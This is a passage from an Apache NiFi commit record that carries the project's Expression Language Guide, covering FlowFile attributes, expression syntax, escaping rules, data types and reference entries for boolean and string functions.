'Arguments:' and adds a missing 'T' to\nthe properly spell the word 'The'.\n\nSigned-off-by: Mike Thomsen 
<ca0fb807feba88baa8476b14928d102f26c2f6be@gmail.com>\n","repos":"YolandaMDavis\/nifi,jfrazee\/nifi,jtstorck\/nifi,jfrazee\/nifi,mattyb149\/nifi,mans2singh\/nifi,MikeThomsen\/nifi,jskora\/nifi,jfrazee\/nifi,mattyb149\/nifi,mcgilman\/nifi,jfrazee\/nifi,mcgilman\/nifi,alopresto\/nifi,pvillard31\/nifi,YolandaMDavis\/nifi,ijokarumawak\/nifi,mcgilman\/nifi,alopresto\/nifi,m-hogue\/nifi,jfrazee\/nifi,jskora\/nifi,m-hogue\/nifi,trixpan\/nifi,mans2singh\/nifi,jtstorck\/nifi,jtstorck\/nifi,YolandaMDavis\/nifi,mans2singh\/nifi,bbende\/nifi,YolandaMDavis\/nifi,pvillard31\/nifi,patricker\/nifi,patricker\/nifi,bbende\/nifi,alopresto\/nifi,pvillard31\/nifi,aperepel\/nifi,MikeThomsen\/nifi,alopresto\/nifi,jtstorck\/nifi,mans2singh\/nifi,alopresto\/nifi,mattyb149\/nifi,mattyb149\/nifi,jskora\/nifi,jskora\/nifi,pvillard31\/nifi,m-hogue\/nifi,pvillard31\/nifi,aperepel\/nifi,patricker\/nifi,pvillard31\/nifi,bbende\/nifi,jtstorck\/nifi,mattyb149\/nifi,bbende\/nifi,jtstorck\/nifi,aperepel\/nifi,ijokarumawak\/nifi,trixpan\/nifi,pvillard31\/nifi,aperepel\/nifi,mans2singh\/nifi,jskora\/nifi,ijokarumawak\/nifi,patricker\/nifi,ijokarumawak\/nifi,jtstorck\/nifi,YolandaMDavis\/nifi,trixpan\/nifi,MikeThomsen\/nifi,ijokarumawak\/nifi,trixpan\/nifi,bbende\/nifi,aperepel\/nifi,ijokarumawak\/nifi,MikeThomsen\/nifi,bbende\/nifi,jfrazee\/nifi,patricker\/nifi,trixpan\/nifi,MikeThomsen\/nifi,alopresto\/nifi,jskora\/nifi,YolandaMDavis\/nifi,YolandaMDavis\/nifi,m-hogue\/nifi,mcgilman\/nifi,mattyb149\/nifi,MikeThomsen\/nifi,patricker\/nifi,m-hogue\/nifi,alopresto\/nifi,mcgilman\/nifi,mans2singh\/nifi,patricker\/nifi,trixpan\/nifi,pvillard31\/nifi,MikeThomsen\/nifi,jfrazee\/nifi,mattyb149\/nifi,m-hogue\/nifi,m-hogue\/nifi,aperepel\/nifi,mcgilman\/nifi,jfrazee\/nifi,mcgilman\/nifi","old_file":"nifi-docs\/src\/main\/asciidoc\/expression-language-guide.adoc","new_file":"nifi-docs\/src\/main\/asciidoc\/expression-language-guide.adoc","new_contents":"\/\/\n\/\/ Licensed to the Apache Software Foundation (ASF) under one or more\n\/\/ contributor license agreements. See the NOTICE file distributed with\n\/\/ this work for additional information regarding copyright ownership.\n\/\/ The ASF licenses this file to You under the Apache License, Version 2.0\n\/\/ (the \"License\"); you may not use this file except in compliance with\n\/\/ the License. You may obtain a copy of the License at\n\/\/\n\/\/ http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\/\/\n\/\/ Unless required by applicable law or agreed to in writing, software\n\/\/ distributed under the License is distributed on an \"AS IS\" BASIS,\n\/\/ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n\/\/ See the License for the specific language governing permissions and\n\/\/ limitations under the License.\n\/\/\n= Apache NiFi Expression Language Guide\nApache NiFi Team <dev@nifi.apache.org>\n:homepage: http:\/\/nifi.apache.org\n:linkattrs:\n\n[[overview]]\n== Overview\nAll data in Apache NiFi is represented by an abstraction called a FlowFile.\nA FlowFile is comprised of two major pieces: content and attributes.\nThe content portion of the FlowFile represents the data on which to operate.\nFor instance, if a file is picked up from a local file system using the\nGetFile Processor, the contents of the file will become the contents of the\nFlowFile.\n\nThe attributes portion of the FlowFile represents information about the data\nitself, or metadata. 
Attributes are key-value pairs that represent what is\nknown about the data as well as information that is useful for routing and\nprocessing the data appropriately.\nKeeping with the example of a file that is picked up from\na local file system, the FlowFile would have an attribute called `filename` that\nreflected the name of the file on the file system. Additionally, the FlowFile will\nhave a `path` attribute that reflects the directory on the file system that this\nfile lived in. The FlowFile will also have an attribute named `uuid`, which is a\nunique identifier for this FlowFile. For complete listing of the core attributes\ncheck out the FlowFile section of the link:developer-guide.html#flowfile[Developer's Guide].\n\nHowever, placing these attributes on a FlowFile do not provide much benefit\nif the user is unable to make use of them. The NiFi Expression Language provides\nthe ability to reference these attributes, compare them to other values,\nand manipulate their values.\n\n\n[[structure]]\n== Structure of a NiFi Expression\n\nThe NiFi Expression Language always begins with the start delimiter `${` and ends\nwith the end delimiter `}`. Between the start and end delimiters is the text of the\nExpression itself. In its most basic form, the Expression can consist of just an\nattribute name. For example, `${filename}` will return the value of the `filename`\nattribute.\n\nIn a slightly more complex example, we can instead return a manipulation of this value.\nWe can, for example, return an all upper-case version of the filename by calling the\n`toUpper` function: `${filename:toUpper()}`. In this case, we reference the `filename`\nattribute and then manipulate this value by using the `toUpper` function. A function call\nconsists of 5 elements. First, there is a function call delimiter `:`. Second is the name\nof the function - in this case, `toUpper`. Next is an open parenthesis (`(`), followed\nby the function arguments. The arguments necessary are dependent upon which function\nis being called. In this example, we are using the `toUpper` function, which does not\nhave any arguments, so this element is omitted. Finally, the closing parenthesis (`)`)\nindicates the end of the function call. There are many different functions that are supported\nby the Expression Language to achieve many different goals. Some functions provide String (text)\nmanipulation, such as the `toUpper` function. Others, such as the `equals` and `matches` functions,\nprovide comparison functionality. Functions also exist for manipulating dates and times and\nfor performing mathematical operations. Each of these functions is described below, in the\n<<functions>> section, with an explanation of what the function does, the arguments that it\nrequires, and the type of information that it returns.\n\nWhen we perform a function call on an attribute, as above, we refer to the attribute as the\n_subject_ of the function, as the attribute is the entity on which the function is operating.\nWe can then chain together multiple function calls, where the return value of the first function\nbecomes the subject of the second function and its return value becomes the subject of the third\nfunction and so on. Continuing with our example, we can chain together multiple functions by using\nthe expression `${filename:toUpper():equals('HELLO.TXT')}`. There is no limit to the number of\nfunctions that can be chained together.\n\nAny FlowFile attribute can be referenced using the Expression Language. 
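For instance, with a hypothetical FlowFile whose `filename` attribute holds `hello.txt`, referencing `${filename}` yields `hello.txt`, chaining `${filename:toUpper()}` yields `HELLO.TXT`, and `${filename:toUpper():equals('HELLO.TXT')}` therefore yields `true`.\n\n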
However, if the attribute\nname contains a \"special character\", the attribute name must be escaped by quoting it. The following\ncharacters are each considered \"special characters\":\n\n- $ (dollar sign)\n- | (pipe)\n- { (open brace)\n- } (close brace)\n- ( (open parenthesis)\n- ) (close parenthesis)\n- [ (open bracket)\n- ] (close bracket)\n- , (comma)\n- : (colon)\n- ; (semicolon)\n- \/ (forward slash)\n- * (asterisk)\n- ' (single quote)\n- (space)\n- \\t (tab)\n- \\r (carriage return)\n- \\n (new-line)\n\nAdditionally, a number is considered a \"special character\" if it is the first character of the attribute name.\nIf any of these special characters is present in an attribute name, the attribute name must be quoted by using either single or double quotes.\nThe Expression Language allows single quotes and double quotes to be used interchangeably. For example, the following\ncan be used to escape an attribute named `my attribute`: `${\"my attribute\"}` or `${'my attribute'}`.\n\nIn this example, the value to be returned is the value of the \"my attribute\" attribute, if it exists. If that attribute\ndoes not exist, the Expression Language will then look for a System Environment Variable named \"my attribute.\" If\nunable to find this, it will look for a JVM System Property named \"my attribute.\" Finally, if none of these exists,\nthe Expression Language will return a `null` value.\n\nThere also exist some functions that expect to have no subject. These functions are invoked simply\nby calling the function at the beginning of the Expression, such as `${hostname()}`. These functions\ncan then be chained together, as well. For example, `${hostname():toUpper()}`. Attempting to\nevaluate the function with a subject will result in an error. In the <<functions>>\nsection below, these functions will clearly indicate in their descriptions that they do not\nrequire a subject.\n\nOftentimes, we will need to compare the values of two different attributes to each other.\nWe are able to accomplish this by using embedded Expressions. We can, for example, check if\nthe `filename` attribute is the same as the `uuid` attribute: `${filename:equals( ${uuid} )}`.\nNotice here, also, that we have a space between the opening parenthesis for the `equals` method and\nthe embedded Expression. This is not necessary and does not affect how the Expression is evaluated\nin any way. Rather, it is intended to make the Expression easier to read. White space is ignored by\nthe Expression Language between delimiters. Therefore, we can use the Expression\n`${ filename : equals(${ uuid}) }` or `${filename:equals(${uuid})}` and both Expressions\nmean the same thing. We cannot, however, use `${file name:equals(${uuid})}`, because this results\nin `file` and `name` being interpreted as different tokens, rather than a single token, `filename`.\n\n\n\n[[usage]]\n== Expression Language in the Application\n\nThe Expression Language is used heavily throughout the NiFi application for configuring Processor\nproperties. Not all Processor properties support the Expression Language, however. Whether or not\na Property supports the Expression Language is determined by the developer of the Processor when\nthe Processor is written. However, the application strives to clearly illustrate for each Property\nwhether or not the Expression Language is supported.\n\nIn the application, when configuring a component property, the User Interface provides an Information\nicon (\nimage:iconInfo.png[\"Info\"]\n) next to the name of the Property. Hovering over this icon with the mouse will provide a tooltip that\nprovides helpful information about the Property. 
Hovering over this icon with the mouse will provide a tooltip that\nprovides helpful information about the Property. This information includes a description of the Property,\nthe default value (if any), historically configured values (if any), and the evaluation scope of this\nproperty for expression language. There are three values and the evaluation scope of the expression\nlanguage is hierarchical: NONE -> VARIABLE_REGISTRY -> FLOWFILE_ATTRIBUTES.\n\n* NONE - expression language is not supported for this property\n* VARIABLE_REGISTRY is hierarchically constructed as below:\n** Variables defined at process group level and then, recursively, up to the higher process group until\nthe root process group.\n** Variables defined in custom properties files through the nifi.variable.registry.properties property\nin nifi.properties file.\n** Environment variables defined at JVM level and system properties.\n* FLOWFILE_ATTRIBUTES - will use attributes of each individual flow file, as well as those variables defined\nby the Variable Registry, as described above.\n\n[[escaping]]\n=== Escaping Expression Language\n:extra-dollar-sign: Hello $${UserName}\n:literal-value: Hello $$User$$Name\n:four-dollar-signs: $$$${abc}\n:five-dollar-signs: $$$$${abc}\n\nThere may be times when a property supports Expression Language, but the user wishes to use a literal value\nthat follows the same syntax as the Expression Language. For example, a user may want to configure a property\nvalue to be the literal text `Hello ${UserName}`. In such a case, this can be accomplished by using an extra\n`$` (dollar sign symbol) just before the expression to escape it (i.e., `{extra-dollar-sign}`). Unless the `$`\ncharacter is being used to escape an Expression, it should not be escaped. For example, the value `{literal-value}`\nshould not escape the `$` characters, so the literal value that will be used is `{literal-value}`.\n\nIf more than two `$` characters are encountered sequentially before a `{`, then each pair of `$` characters will\nbe considered an escaping of the `$` character. The escaping will be performed from left-to-right.\nTo help illustrate this, consider that the variable `abc` contains the value `xyz`. Then, consider the following\ntable of Expressions and their corresponding evaluated values:\n\n.Escaping EL Examples\n|========================================================================================\n| Expression | Value | Notes\n| `${abc}` | `xyz` |\n| `$${abc}` | `${abc}` |\n| `$$${abc}` | `$xyz` |\n| `{four-dollar-signs}` | `$${abc}` |\n| `{five-dollar-signs}` | `$$xyz` |\n| `I owe you $5` | `I owe you $5` | No actual Expression is present here.\n| `You owe me $$5 too` | `You owe me $$5 too` | The $ character is not escaped because it does not immediately precede an Expression.\n| `Unescaped $$${5 because no closing brace` | `Unescaped $$${5 because no closing brace` | Because there is no closing brace here, there is no actual Expression and hence the $ characters are not\nescaped.\n| `Unescaped $$${5} because no closing brace` | <Error> | This expression is not valid because it equates to an escaped $, followed by `${5}` and the `${5}` is not a valid Expression. The number\nmust be escaped.\n| `Unescaped $$${'5'} because no closing brace` | `Unescaped $ because no closing brace` | There is no attribute named `5` so the Expression evaluates to an empty string. 
The `$$` evaluates to a\nsingle (escaped) `$` because it immediately precedes an Expression.\n|========================================================================================\n\n[[editor]]\n=== Expression Language Editor\n\nWhen configuring the value of a Processor property, the NiFi User Interface provides help with the\nExpression Language using the Expression Language editor. Once an Expression is begun by typing `${`,\nthe editor begins to highlight parentheses and braces so that the user is easily able to tell which\nopening parenthesis or brace matches which closing parenthesis or brace.\n\nThe editor also supplies context-sensitive help by providing a list of all functions that can be used\nat the current cursor position. To activate this feature, press Ctrl+Space on the keyboard. The user\nis also able to type part of a function name and then press Ctrl+Space to see all functions that can\nbe used that start with the same prefix. For example, if we type into the editor `${filename:to`\nand then press Ctrl+Space, we are provided a pop-up that lists six different functions: `toDate`,\n`toLower`, `toNumber`, `toRadix`, `toString`, and `toUpper`. We can then continue typing to narrow\nwhich functions are shown, or we can select one of the functions from the list by double-clicking\nit with the mouse or using the arrow keys to highlight the desired function and pressing Enter.\n\n\n\n[[functions]]\n== Functions\n\nFunctions provide a convenient way to manipulate and compare values of attributes. The Expression Language\nprovides many different functions to meet the needs of an automated dataflow. Each function takes\nzero or more arguments and returns a single value. These functions can then be chained together to create\npowerful Expressions to evaluate conditions and manipulate values. See <<structure>> for more information\non how to call and chain functions together.\n\n[[types]]\n=== Data Types\n\nEach argument to a function and each value returned from a function has a specific data type. The Expression\nLanguage supports five different data types:\n\n- *String*: A String is a sequence of characters that can consist of numbers, letters, white space, and\n\tspecial characters.\n- *Number*: A Number is a whole number comprised of one or more digits (`0` through `9`). When converting from Date data types, Numbers are represented as\n\tthe number of milliseconds since midnight GMT on January 1, 1970.\n- *Decimal*: A Decimal is a numeric value that can support decimals and larger values with minimal loss of precision. More precisely it\n is a double-precision 64-bit IEEE 754 floating point. Due to this minimal loss of precision this data type should not be used for\n very precise values, such as currency. For more documentation on the range of values stored in this data type\n refer to this link:https:\/\/docs.oracle.com\/javase\/specs\/jls\/se7\/html\/jls-4.html#jls-4.2.3[link^]. The following are some examples of the forms of\n literal decimals that are supported in expression language (the \"E\" can also be lower-case):\n\n * 1.1\n * .1E1\n * 1.11E-12\n\n- *Date*: A Date is an object that holds a Date and Time. Utilizing the <<dates>> and <<type_cast>> functions this data\n\ttype can be converted to\/from Strings and numbers. 
If the whole Expression Language expression evaluates to a
	Date, it will be converted to a String with the format: "<Day of Week> <Month> <Day of Month> <Hour>:<Minute>:<Second> <Time Zone> <Year>",
	also expressed as "E MMM dd HH:mm:ss z yyyy" in Java SimpleDateFormat notation. For example: "Wed Dec 31 12:00:04 UTC 2014".
- *Boolean*: A Boolean is one of either `true` or `false`.

After evaluating expression language functions, all attributes are stored as type String.

The Expression Language is generally able to automatically coerce a value of one data type to the appropriate
data type for a function. However, functions do exist to manually coerce a value into a specific data type.
See the <<type_cast>> section for more information.

Hex values are supported for Number and Decimal types but they must be quoted and prepended with "0x" when being
interpreted as literals. For example, these two expressions are valid (without the quotes or "0x" the expression would fail to run properly):

 - ${literal("0xF"):toNumber()}
 - ${literal("0xF.Fp10"):toDecimal()}




[[boolean]]
== Boolean Logic

One of the most powerful features of the Expression Language is the ability to compare an attribute value against
some other value. This is used often, for example, to configure how a Processor should route data. The following
functions are used for performing boolean logic, such as comparing two values.
Each of these functions returns a value of type Boolean.


[.function]
=== isNull
*Description*: [.description]#The `isNull` function returns `true` if the subject is null, `false` otherwise. This is typically used to determine
if an attribute exists.#

*Subject Type*: [.subject]#Any#

*Arguments*: No arguments

*Return Type*: [.returnType]#Boolean#

*Examples*:	`${filename:isNull()}` returns `true` if the "filename" attribute does not exist.
	It returns `false` if the attribute exists.



[.function]
=== notNull
*Description*: [.description]#The `notNull` function returns the opposite value of the `isNull` function. That is, it will return `true` if the
subject exists and `false` otherwise.#

*Subject Type*: [.subject]#Any#

*Arguments*: No arguments

*Return Type*: [.returnType]#Boolean#

*Examples*: `${filename:notNull()}` returns `true` if the "filename" attribute exists. It returns `false` if the attribute
	does not exist.



[.function]
=== isEmpty
*Description*: [.description]#The `isEmpty` function returns `true` if the Subject is null, does not contain any characters
	or contains only white-space (new line, carriage return, space, tab), `false` otherwise.#

*Subject Type*: [.subject]#String#

*Arguments*: No arguments

*Return Type*: [.returnType]#Boolean#

*Examples*: `${filename:isEmpty()}` returns `true` if the "filename" attribute does not exist or contains only
	white space. `${literal(" "):isEmpty()}` returns `true`, as does `${literal(""):isEmpty()}`.
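A common use of these checks is guarding on an attribute that must both exist and be non-blank. Combining them
with the `and` and `not` functions described below gives a compact sketch:

-----------------------------------------------
${filename:notNull():and(
	${filename:isEmpty():not()}
)}
-----------------------------------------------

This returns `true` only when the "filename" attribute exists and contains at least one non-whitespace character.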
[.function]
=== equals

[.description]
*Description*: [.description]#The `equals` function is very widely used and determines if its subject is equal to another String value.
	Note that the `equals` function performs a direct comparison of two String values. Take care not to confuse this
	function with the <<matches>> function, which evaluates its subject against a Regular Expression.#

[.subject]
*Subject Type*: [.subject]#Any#

[.arguments]
*Arguments*:

	- [.argName]#_value_# : [.argDesc]#The value to compare the Subject to. Must be same type as the Subject.#

[.returnType]
*Return Type*: [.returnType]#Boolean#

[.examples]
*Examples*:
We can check if the filename of a FlowFile is "hello.txt" by using the expression `${filename:equals('hello.txt')}`,
or we could check if the value of the attribute `hello` is equal to the value of the `filename` attribute:
`${hello:equals( ${filename} )}`.



[.function]
=== equalsIgnoreCase
*Description*: [.description]#Similar to the `equals` function, the `equalsIgnoreCase` function compares its subject against a String value, but returns
`true` if the two values are equal when letter casing (upper case vs. lower case) is ignored.#

*Subject Type*: [.subject]#String#

*Arguments*:

	- [.argName]#_value_# : [.argDesc]#The value to compare the Subject to.#

*Return Type*: [.returnType]#Boolean#

*Examples*: `${filename:equalsIgnoreCase('hello.txt')}` will evaluate to `true` if filename is equal to "hello.txt"
	or "HELLO.TXT" or "HeLLo.TxT".




[.function]
=== gt
*Description*: [.description]#The `gt` function is used for numeric comparison and returns `true` if the subject is Greater Than
	its argument. If either the subject or the argument cannot be coerced into a Number,
	this function returns `false`.#

*Subject Type*: [.subject]#Number#

*Arguments*:

	- [.argName]#_value_# : [.argDesc]#The number to compare the Subject to.#

*Return Type*: [.returnType]#Boolean#

*Examples*: `${fileSize:gt( 1024 )}` will return `true` if the size of the FlowFile's content is more than 1 kilobyte
	(1024 bytes). Otherwise, it will return `false`.




[.function]
=== ge
*Description*: [.description]#The `ge` function is used for numeric comparison and returns `true` if the subject is Greater Than
	Or Equal To its argument. If either the subject or the argument cannot be coerced into a Number,
	this function returns `false`.#

*Subject Type*: [.subject]#Number#

*Arguments*:

	- [.argName]#_value_# : [.argDesc]#The number to compare the Subject to.#

*Return Type*: [.returnType]#Boolean#

*Examples*: `${fileSize:ge( 1024 )}` will return `true` if the size of the FlowFile's content is at least
	(is greater than or equal to) 1 kilobyte (1024 bytes). Otherwise, it will return `false`.



[.function]
=== lt
*Description*: [.description]#The `lt` function is used for numeric comparison and returns `true` if the subject is Less Than
	its argument. If either the subject or the argument cannot be coerced into a Number,
	this function returns `false`.#

*Subject Type*: [.subject]#Number#

*Arguments*:

	- [.argName]#_value_# : [.argDesc]#The number to compare the Subject to.#

*Return Type*: [.returnType]#Boolean#

*Examples*: `${fileSize:lt( 1048576 )}` will return `true` if the size of the FlowFile's content is less than
	1 megabyte (1048576 bytes). Otherwise, it will return `false`.




[.function]
=== le
*Description*: [.description]#The `le` function is used for numeric comparison and returns `true` if the subject is Less Than
	Or Equal To its argument.
If either the subject or the argument cannot be coerced into a Number,
	this function returns `false`.#

*Subject Type*: [.subject]#Number#

*Arguments*:

	- [.argName]#_value_# : [.argDesc]#The number to compare the Subject to.#

*Return Type*: [.returnType]#Boolean#

*Examples*: `${fileSize:le( 1048576 )}` will return `true` if the size of the FlowFile's content is at most
	(less than or equal to) 1 megabyte (1048576 bytes). Otherwise, it will return `false`.




[.function]
=== and
*Description*: [.description]#The `and` function takes as a single argument a Boolean value and returns `true` if both the Subject
	and the argument are `true`. If either the subject or the argument is `false` or cannot be coerced into a Boolean,
	the function returns `false`. Typically, this is used with an embedded Expression as the argument.#

*Subject Type*: [.subject]#Boolean#

*Arguments*:

	- [.argName]#_condition_# : [.argDesc]#The right-hand-side of the 'and' Expression#


*Return Type*: [.returnType]#Boolean#

*Examples*: We can check if the filename is both all lower-case and has at least 5 characters by using the Expression
-----------------------------------------------
${filename:toLower():equals( ${filename} ):and(
	${filename:length():ge(5)}
)}
-----------------------------------------------




[.function]
=== or

*Description*: [.description]#The `or` function takes as a single argument a Boolean value and returns `true` if either the Subject
	or the argument is `true`. If both the subject and the argument are `false`, the function returns `false`. If
	either the Subject or the argument cannot be coerced into a Boolean value, this function will return `false`.#

*Subject Type*: [.subject]#Boolean#

*Arguments*:

	- [.argName]#_condition_# : [.argDesc]#The right-hand-side of the 'or' Expression#

*Return Type*: [.returnType]#Boolean#

*Examples*: The following example will return `true` if either the filename has exactly 5 characters or if
	the filename is all lower-case.
----------------------------------------------
${filename:toLower():equals( ${filename} ):or(
	${filename:length():equals(5)}
)}
----------------------------------------------
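These boolean functions can also be nested to express routing rules that consider several attributes at once.
As an illustrative sketch (the attribute names mirror the examples above), the following returns `true` only for
a file whose name ends in `.txt` and whose content is at most 1 megabyte:

-----------------------------------------------
${filename:endsWith('.txt'):and(
	${fileSize:le(1048576)}
)}
-----------------------------------------------

The `endsWith` function is described in the <<searching>> section below.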
[.function]
=== not

[.description]
*Description*: [.description]#The `not` function returns the negation of the Boolean value of the subject.#

[.subject]
*Subject Type*: [.subject]#Boolean#

[.arguments]
*Arguments*: No arguments

[.returnType]
*Return Type*: [.returnType]#Boolean#

[.examples]
*Examples*: We can invert the value of another function by using the `not` function, as
	`${filename:equals('hello.txt'):not()}`. This will return `true` if the filename is NOT equal to
	"hello.txt" and will return `false` if the filename is "hello.txt".



[.function]
=== ifElse

*Description*: [.description]#Evaluates the first argument if the Subject evaluates to `true`, or the second argument
if the Subject evaluates to `false`.#

*Subject Type*: [.subject]#Boolean#

*Arguments*:

	- [.argName]#_EvaluateIfTrue_# : [.argDesc]#The value to return if the Subject is true#
	- [.argName]#_EvaluateIfFalse_# : [.argDesc]#The value to return if the Subject is false#

*Return Type*: [.returnType]#String#

*Examples*: If the "filename" attribute has the value "a brand new filename.txt", the "nullFilename" attribute has
the value null, and the "bool" attribute has the value "true", then the following expressions will provide
the following results:



.ifElse Examples
|===================================================================
| Expression | Value
| `${bool:ifElse('a','b')}` | `a`
| `${literal(true):ifElse('a','b')}` | `a`
| `${nullFilename:isNull():ifElse('file does not exist', 'located file')}` | `file does not exist`
| `${nullFilename:ifElse('found', 'not_found')}` | `not_found`
| `${filename:ifElse('found', 'not_found')}` | `not_found`
| `${filename:isNull():not():ifElse('found', 'not_found')}` | `found`
|===================================================================




[[strings]]
== String Manipulation

Each of the following functions manipulates a String in some way.




[.function]
=== toUpper

*Description*: [.description]#This function converts the Subject into an all upper-case String. Said another way, it
	replaces any lowercase letter with the uppercase equivalent.#

*Subject Type*: [.subject]#String#

*Arguments*: No arguments

*Return Type*: [.returnType]#String#

*Examples*: If the "filename" attribute is "abc123.txt", then the Expression `${filename:toUpper()}`
	will return "ABC123.TXT".





[.function]
=== toLower

*Description*: [.description]#This function converts the Subject into an all lower-case String. Said another way,
	it replaces any uppercase letter with the lowercase equivalent.#

*Subject Type*: [.subject]#String#

*Arguments*: No arguments

*Return Type*: [.returnType]#String#

*Examples*: If the "filename" attribute is "ABC123.TXT", then the Expression `${filename:toLower()}`
	will return "abc123.txt".





[.function]
=== trim

*Description*: [.description]#The `trim` function will remove any leading or trailing white space from its subject.#

*Subject Type*: [.subject]#String#

*Arguments*: No arguments

*Return Type*: [.returnType]#String#

*Examples*: If the attribute `attr` has the value " 1 2 3 ", then the Expression `${attr:trim()}` will
	return the value "1 2 3".
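String functions chain together naturally, which is often used to normalize attribute values before comparing
them. As a small sketch, assume a hypothetical attribute `userInput` with the value "  Hello World  ":

-----------------------------------------------
${userInput:trim():toLower()}
-----------------------------------------------

This returns `hello world`, ready for a case-insensitive `equals` check.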
[.function]
=== substring

*Description*:
[.description]#Returns a portion of the Subject, given a _starting index_ and an optional _ending index_.
	If the _ending index_ is not supplied, it will return the portion of the Subject starting at the given
	'start index' and ending at the end of the Subject value.#

[.description]#The _starting index_ and _ending index_ are zero-based. That is, the first character is referenced by using
	the value `0`, not `1`.#

[.description]#If either the _starting index_ or the _ending index_ is not a number, this function call will result
	in an error.#

[.description]#If the _starting index_ is larger than the _ending index_, this function call will result in an error.#

[.description]#If the _starting index_ or the _ending index_ is greater than the length of the Subject or has a value
	less than 0, this function call will result in an error.#


*Subject Type*: [.subject]#String#

*Arguments*:

	- [.argName]#_starting index_# : [.argDesc]#The 0-based index of the first character to capture (inclusive)#
	- [.argName]#_ending index_# : [.argDesc]#The 0-based index of the last character to capture (exclusive)#

*Return Type*: [.returnType]#String#

*Examples*:

If we have an attribute named "filename" with the value "a brand new filename.txt",
then the following Expressions will result in the following values:

.Substring Examples
|================================================================
| Expression | Value
| `${filename:substring(0,1)}` | `a`
| `${filename:substring(2)}` | `brand new filename.txt`
| `${filename:substring(12)}` | `filename.txt`
| `${filename:substring( ${filename:length():minus(2)} )}` | `xt`
|================================================================




[.function]
=== substringBefore

*Description*: [.description]#Returns a portion of the Subject, starting with the first character of the Subject
	and ending with the character immediately before the first occurrence of the argument. If
	the argument is not present in the Subject, the entire Subject will be returned.#

*Subject Type*: [.subject]#String#

*Arguments*:

	- [.argName]#_value_# : [.argDesc]#The String to search for in the Subject#

*Return Type*: [.returnType]#String#

*Examples*: If the "filename" attribute has the value "a brand new filename.txt",
	then the following Expressions will result in the following values:

.SubstringBefore Examples
|======================================================================
| Expression | Value
| `${filename:substringBefore('.')}` | `a brand new filename`
| `${filename:substringBefore(' ')}` | `a`
| `${filename:substringBefore(' n')}` | `a brand`
| `${filename:substringBefore('missing')}` | `a brand new filename.txt`
|======================================================================





[.function]
=== substringBeforeLast

*Description*: [.description]#Returns a portion of the Subject, starting with the first character of the Subject
	and ending with the character immediately before the last occurrence of the argument.
If\n\tthe argument is not present in the Subject, the entire Subject will be returned.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_value_# : [.argDesc]#The String to search for in the Subject#\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the \"filename\" attribute has the value \"a brand new filename.txt\",\n\tthen the following Expressions will result in the following values:\n\n.SubstringBeforeLast Examples\n|==========================================================================\n| Expression | Value\n| `${filename:substringBeforeLast('.')}` | `a brand new filename`\n| `${filename:substringBeforeLast(' ')}` | `a brand new`\n| `${filename:substringBeforeLast(' n')}` | `a brand`\n| `${filename:substringBeforeLast('missing')}` | `a brand new filename.txt`\n|==========================================================================\n\n\n\n\n\n\n[.function]\n=== substringAfter\n\n*Description*: [.description]#Returns a portion of the Subject, starting with the character immediately after\n\tthe first occurrence of the argument and extending to the end of the Subject. If\n\tthe argument is not present in the Subject, the entire Subject will be returned.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_value_# : [.argDesc]#The String to search for in the Subject#\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the \"filename\" attribute has the value \"a brand new filename.txt\",\n\tthen the following Expressions will result in the following values:\n\n.SubstringAfter Examples\n|======================================================================\n| Expression | Value\n| `${filename:substringAfter('.')}` | `txt`\n| `${filename:substringAfter(' ')}` | `brand new filename.txt`\n| `${filename:substringAfter(' n')}` | `ew filename.txt`\n| `${filename:substringAfter('missing')}` | `a brand new filename.txt`\n|======================================================================\n\n\n\n\n\n[.function]\n=== substringAfterLast\n\n*Description*: [.description]#Returns a portion of the Subject, starting with the character immediately after\n\tthe last occurrence of the argument and extending to the end of the Subject. If\n\tthe argument is not present in the Subject, the entire Subject will be returned.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_value_# : [.argDesc]#The String to search for in the Subject#\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the \"filename\" attribute has the value \"a brand new filename.txt\",\n\tthen the following Expressions will result in the following values:\n\n.SubstringAfterLast Examples\n|=========================================================================\n| Expression | Value\n| `${filename:substringAfterLast('.')}` | `txt`\n| `${filename:substringAfterLast(' ')}` | `filename.txt`\n| `${filename:substringAfterLast(' n')}` | `ew filename.txt`\n| `${filename:substringAfterLast('missing')}` | `a brand new filename.txt`\n|=========================================================================\n\n\n\n\n[.function]\n=== getDelimitedField\n\n*Description*: [.description]#Parses the Subject as a delimited line of text and returns just a single field\n\tfrom that delimited text.#\n\n*Subject Type*: [.subject]#String#\n\n*Arguments*:\n\n\t- [.argName]#_index_# : [.argDesc]#The index of the field to return. 
A value of 1 will return the first field,\n\t\ta value of 2 will return the second field, and so on.#\n\t- [.argName]#_delimiter_# : [.argDesc]#Optional argument that provides the character to use as a field separator.\n\t\tIf not specified, a comma will be used. This value must be exactly 1 character.#\n\t- [.argName]#_quoteChar_# : [.argDesc]#Optional argument that provides the character that can be used to quote values\n\t\tso that the delimiter can be used within a single field. If not specified, a double-quote (\") will be used. This value\n\t\tmust be exactly 1 character.#\n\t- [.argName]#_escapeChar_# : [.argDesc]#Optional argument that provides the character that can be used to escape the Quote Character\n\t or the Delimiter within a field. If not specified, a backslash (\\) is used. This value must be exactly 1 character.#\n\t- [.argName]#_stripChars_# : [.argDesc]#Optional argument that specifies whether or not quote characters and escape characters should\n\t be stripped. For example, if we have a field value \"1, 2, 3\" and this value is true, we will get the value `1, 2, 3`, but if this\n\t value is false, we will get the value `\"1, 2, 3\"` with the quotes. The default value is false. This value must be either `true`\n\t or `false`.#\n\n*Return Type*: [.returnType]#String#\n\n*Examples*: If the \"line\" attribute contains the value _\"Jacobson, John\", 32, Mr._\n\tand the \"altLine\" attribute contains the value _Jacobson, John|32|Mr._\n then the following Expressions will result in the following values:\n\n.GetDelimitedField Examples\n|======================================================================\n| Expression | Value\n| `${line:getDelimitedField(2)}` | _(space)_32\n| `${line:getDelimitedField(2):trim()}` | 32\n| `${line:getDelimitedField(1)}` | \"Jacobson, John\"\n| `${line:getDelimitedField(1, ',', '\"', '\\\\', true)}` | Jacobson, John\n| `${altLine:getDelimitedField(1, '\\|')}` | Jacobson, John\n|======================================================================\n\n\n\n[.function]\n=== append\n\n*Description*: [.description]#The `append` function returns the result of appending the argument to the value of\n\tthe Subject. 